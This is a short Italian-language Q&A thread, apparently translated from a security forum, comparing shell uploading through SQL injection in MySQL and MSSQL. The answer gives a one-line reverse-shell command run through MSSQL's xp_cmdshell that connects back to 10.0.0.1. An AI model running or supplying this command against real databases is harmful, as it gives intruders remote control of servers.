MySQL vs MSSQL injection to shell uploading [chiuso]

-1

Qual è la differenza tra il caricamento di una shell tramite sqli in mysql vs mssql?

    
posta thefirethefox 24.12.2014 - 21:28
fonte

1 risposta

2

MSSQL ha un comando incorporato chiamato xp_cmdshell che esegue i comandi di sistema per te (quanto utile, eh?). Ecco come si ottiene una shell su un sistema Linux con MSSQL:

EXEC xp_cmdshell ‘bash -i >& /dev/tcp/10.0.0.1/8080 0>&1’

Con MySQL, devi essere davvero intelligente sulle cose e usare OUTFILE, una stored procedure o qualcosa del genere.

    
risposta data 24.12.2014 - 23:09
fonte

Leggi altre domande sui tag